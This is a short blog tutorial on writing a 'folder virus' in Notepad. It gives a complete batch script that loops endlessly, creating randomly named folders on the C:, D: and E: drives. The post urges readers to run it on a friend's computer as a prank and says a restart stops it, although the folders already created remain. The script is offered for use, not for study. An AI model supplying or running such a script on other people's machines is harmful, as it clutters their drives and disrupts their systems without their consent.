Home Uncategorized How to create a Folder Virus using Notepad

How to create a Folder Virus using Notepad

4
How to create a Folder Virus using Notepad

Hi, in previous article we discussed about creating a shutdown virus. You can read that article here. In this article we will create a folder virus using notepad. Just follow the below given steps.

Steps to create a Folder Virus using Notepad:

1: Open Notepad: Open notepad from [Start >> Run >> Type “Notepad” and press Enter. Copy the below code in Notepad:

@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
REM #######################
REM errorcode401.blogspot.in

2: Save the file: Now save the file as Virus.bat in your desktop. Just click Save as and save it as File name:  Virus.bat and File Type: All Files.

Create a Folder virus using notepad

 

You have successfully created a Folder virus using notepad. You can copy this trick in your friend’s computer and wait for his reaction. You can stop this virus by siimply restarting the system.

If you are still facing problems, comment below

4 COMMENTS